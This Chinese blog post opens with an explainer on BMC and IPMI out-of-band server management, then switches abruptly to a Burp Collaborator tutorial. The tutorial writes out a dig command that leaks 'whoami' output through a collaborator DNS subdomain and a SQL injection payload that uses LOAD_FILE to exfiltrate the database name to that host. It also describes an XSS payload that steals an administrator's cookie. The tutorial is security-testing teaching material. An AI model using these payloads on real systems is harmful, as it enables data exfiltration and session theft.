BMC全称BaseboardManagementController,通俗来讲,BMC是整个服务器单板的大管家。从一款服务器上电时刻,它的所有部件都归BMC来负责和管理。
IPMI:智能平台管理接口(IPMI)是一种开放标准的硬件管理接口规格,定义了嵌入式管理子系统进行通信的特定方法。IPMI信息通过基板管理控制器(BMC)(位于IPMI规格的硬件组件上)进行交流。使用低级硬件智能管理而不使用操作系统进行管理,具有两个主要优点:首先,此配置允许进行带外服务器管理;其次,操作系统不必负担传输系统状态数据的任务。
认识IPMI
IPMI是智能型平台管理接口(IntelligentPlatformManagementInterface)的缩写,是管理基于Intel结构的企业系统中所使用的外围设备采用的一种工业标准,该标准由英特尔、惠普、NEC、美国戴尔电脑和SuperMicro等公司制定。用户可以利用IPMI监视服务器的物理健康特征,如温度、电压、风扇工作状态、电源状态等。而且更为重要的是IPMI是一个开放的免费标准,用户无需为使用该标准而支付额外的费用。
IPMI工作原理
IPMI的核心是一个专用芯片/控制器(叫做服务器处理器或基板管理控制器(BMC)),其并不依赖于服务器的处理器、BIOS或操作系统来工作,可谓非常地独立,是一个单独在系统内运行的无代理管理子系统,只要有BMC与IPMI固件其便可开始工作,而BMC通常是一个安装自爱服务器主板上的独立的板卡,现在也有服务器主板提供对IPMI支持的。IPMI良好的自治特性便克服了以往基于操作系统的管理方式所受的限制,例如操作系统不响应或未加载的情况下其仍然可以进行开关机、信息提取等操作。
在工作时,所有的IPMI功能都是向BMC发送命令来完成的,命令使用IPMI规范中规定的指令,BMC接收并在系统事件日志中记录事件消息,维护描述系统中传感器情况的传感器数据记录。在需要远程访问系统时,IPMI新的LAN上串行(SOL)特性很有用。SOL改变IPMI会话过程中本地串口传送方向,从而提供对紧急管理服务、Windows专用管理控制台或Linux串行控制台的远程访问。BMC通过在LAN上改变传送给串行端口的信息的方向来做到这点,提供了一种与厂商无关的远程查看启动、操作系统加载器或紧急管理控制台来诊断和维修故障的标准方式。
一般来说,BMC具有以下功能:
1.通过系统的串行端口进行访问
2.故障日志记录和SNMP警报发送
3.访问系统事件日志(SystemEventLog,SEL)和传感器状况
4.控制包括开机和关机
5.独立于系统电源或工作状态的支持
6.用于系统设置、基于文本公用程序和操作系统控制台的文本控制台重定向
而通过IPMI,用户可以主动监测组件的状况,以确保不超出预置阈值,例如服务器温度。这样,通过避免不定期的断电,协助维护了IT资源的运行时间。IPMI的预告故障能力也有助于IT周期的管理。通过检查系统事件日志(SEL),可以更轻松的预先判定故障组件。
Burp Collaborator 是 OAST的产物,它可以帮你实现对响应不可见和异步的一个漏洞检测。
目前 Burp 发布的新版本中默认携带了 Burp Collaborator 模块
Burp Collaborator 模型 参考上文带外攻击模型
Burp Collaborator 有自己专用域名 burpcollaborator.net ,类似于ceye平台,有一个权威DNS服务器,用户使用Collaborator模块时会给每一个用户会分配一个二级域名。
Burp Collaborator 只是一个客户端,我们可以使用 Burp 给我们配置的默认带外服务器,也可以使用自己私有的服务器。
Burp Collaborator 配置
可以选择使用默认的配置 外带服务器,也可以自己设置外带服务器
点击 Run health check 可以测试外带服务器服务是否正常
打开 Collaborator 客户端
使用 Client
使用 dig 查询 域名
<pre class="md-fences md-end-block ty-contain-cm modeLoaded" spellcheck="false" cid="n53" mdtype="fences" style="box-sizing: border-boxoverflow: visiblefont-family: var(--monospace)font-size: 0.9emdisplay: blockbreak-inside: avoidtext-align: leftwhite-space: normalbackground-image: inheritbackground-position: inheritbackground-size: inheritbackground-repeat: inheritbackground-attachment: inheritbackground-origin: inheritbackground-clip: inheritbackground-color: rgb(248, 248, 248)position: relative !importantborder: 1px solid rgb(231, 234, 237)border-radius: 3pxpadding: 8px 4px 6pxmargin-bottom: 15pxmargin-top: 15pxwidth: inheritcolor: rgb(51, 51, 51)font-style: normalfont-variant-ligatures: normalfont-variant-caps: normalfont-weight: 400letter-spacing: normalorphans: 2text-indent: 0pxtext-transform: nonewidows: 2word-spacing: 0px-webkit-text-stroke-width: 0pxtext-decoration-thickness: initialtext-decoration-style: initialtext-decoration-color: initial" lang="">dig whoami .7jr9gk6gtnstix33jp6181eu2l8cw1.burpcollaborator.net</pre>
查看 Client 返回的日志
可见,我们通过dig 查看DNS记录的方式,将whoami的命令携带发送到服务器。
使用Burp 提供的靶场,来介绍 Burp Collaborator的用法
工作原理
Burp Collaborator 生成唯一的域名,将它们以有效负载的形式发送到应用程序,并监视与这些域的任何交互。如果观察到来自应用程序的传入请求,那么就可以检测到对应的漏洞。
检测过程
将Burp Collaborator Client 的获取的域名 添加HTTP请求的 Referer位置 等待几秒 然后点击poll now 会看到应用程序启动的DNS 和HTTP交互
我这里使用 sqli 的靶场演示一下利用 burp Collaborator 实现DNSLog注入
前提条件: secure_file_priv 为空,(如果非空,只能读取对应目录下的文件)
select 1,2,LOAD_FILE(concat('\\\\',database(),'~','xwxb0b0bnpm5bnjbo19apeivpmvfj4.burpcollaborator.net\\a')) --+
在 xss payload 中,添加自己burp collaborator 生成的域名
等待 管理员查看评论即可触发 xss payload 实现对cookie 的获取
还有更多用法,期待大家去发现,
欢迎分享,转载请注明来源:夏雨云
评论列表(0条)